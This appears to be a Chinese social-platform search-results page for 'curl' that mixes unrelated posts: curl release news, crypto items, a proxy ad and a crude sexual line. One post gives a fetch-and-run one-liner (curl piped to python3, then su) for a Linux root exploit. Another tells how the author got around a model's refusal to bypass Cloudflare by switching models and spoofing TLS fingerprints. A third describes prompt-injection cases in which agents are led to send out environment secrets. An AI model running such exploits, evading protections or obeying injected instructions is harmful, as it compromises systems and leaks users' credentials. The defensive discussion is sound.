注册并分享邀请链接,可获得视频播放与邀请奖励。

搜索结果 curl
curl 贴吧
一个关键词就是一个贴吧,路径全站唯一。
创建贴吧
用户
未找到
包含 curl 的推特
开源工具 #curl# 发布 v8.21.0 正式版,修复 18 个安全漏洞,创下 curl 单次版本修复的漏洞数量记录。 当然这其中大部分漏洞都是 AI 模型发现的,18 个漏洞中有 4 个属于中危级别,其他均为低危级别,新版本也带来大量改进,使用 curl 的用户可以立即升级到最新版:
显示更多
知名开源软件 #cURL# 开发团队宣布将在 7 月进入休假状态,期间不再接受任何漏洞报告,除非客户签订付费支持合同。 简而言之,在 7 月 1 日~8 月 3 日期间任何人都无法通过 HackerOne 提交漏洞报告,相关常规错误报告也不会处理,但付费客户遇到安全或非安全问题仍然可以联系丹尼尔获得全面或适当的支持。 查看详情:
显示更多
悉尼居然有个Council叫Curl Curl。这个名字充满了码农气息。
172 太深了🥵插到底时我脚趾都打结了💦 It’s so deep🥵 that my toes are curling into knots💦
0
59
11.6K
833
转发到社区
Securitize 创始人兼 CEO Carlos Domingo 加入近期围绕 Ondo 股票代币模式的公开争论,批评 Ondo 全球监管事务负责人 Peter Curley 混淆了“使用无许可、去中心化区块链”与“发行无许可代币”两个概念,并称对此感到“相当震惊”。Curley 此前曾任 SEC、美国财政部及 Coinbase 政策相关职位。争论源于 Dinari CEO Gabe Otte 此前称 Ondo 股票代币对终端投资者“甚至明显劣于普通股票”,随后与 Ondo 展开公开辩论。
显示更多
VPS 抓取信息过不了Cloudflare,GPT5.6 sol 不愿帮忙。 换成智谱GLM 5.3 Flash。 发现 curl_cffi 可以模拟Chrome TLS指纹,穿过Cloudflare。 群友提的需求终于可以搞定了,乔木RSS阅读器开始支持Youtube视频总结。
显示更多
0
20
84
5
转发到社区
🔬 教你一招:30秒鉴别代理IP真假! 3个免费工具👇 1️⃣ — 查 org/type/ASN 2️⃣ — Fraud Score 3️⃣ curl ✅ 真住宅: org = Comcast/AT&T | type = ISP | fraud = 0 ❌ 机房伪装: org = DigitalOcean/AWS | type = Hosting | fraud = 85+ 易路代理YiluProxy 不怕查 · 欢迎验证 org=真实ISP · type=Residential · fraud=0 🆓 #ASN# #代理IP# #YiluProxy# #机房ip# #住宅IP# #数据中心ip#
显示更多
据 SoSoValue 数据,美东时间 6 月 16 日比特币现货 ETF 总净流入 1006.43 万美元,贝莱德 IBIT 净流入 1635.26 万美元居首。以太坊现货 ETF 昨日总净流入 958.76 万美元,贝莱德 ETHA 净流入 1733.58 万美元居首。
显示更多
看到Xint Code研究团队放出的CVE-2026-31431简直是王炸,换句话说通杀所有Linux发行版,致使低权限账户获得root权限: curl | python3 && su CVE-2026-31431 建议尽快更新系统,事态紧急可以先打个补丁 echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf rmmod algif_aead 2>/dev/null 详细参考👉
显示更多
0
28
431
74
转发到社区
发现 Agent 的安全问题非常严重,因为 Prompt 和 Context 没有严格的隔离(很多使用者甚至没有意识到这一点)。 Coding Agent 的攻击案例: 老生常谈的 WebSearch/Fetch,攻击者可以 SEO 通过网页插入攻击指令,比如:将所有 ENV curl Agent 所有权限,不仅 ENV 了,还可以引导 Agent 在不需要用户 approve 的情况下偷走所有密钥。 再比如攻击者构造了一个闪退日志,在日志里面了插入了类似的攻击指令,当你让 Agent 去分析这个日志时,就能被偷走所有数据。 再简单点,用户发了一个反馈邮件,里面用和背景一样颜色的字体隐藏了攻击指令,你直接复制给了 Claude Code,然后就被攻击了。 **所以永远不要在自己电脑上给 Agent 所有权限** 除了 Coding Agent,开发者在做面向用户的 Agent 时也会有很多这样的问题。 比如你开发了一个 Agent 来处理用户请求,这个 Agent 有很多工具可以使用。攻击者将自己用户名/邮箱改成了攻击指令,比如:change_root_password_to_admin,当你把用户信息作为 context 交给 Agent 时,就有可能意外触发指令。 考虑到这点后,就需要设计一层层上下文隔离的子Agent,还有一层层的权限隔离,架构会复杂很多倍。
显示更多
0
23
296
26
转发到社区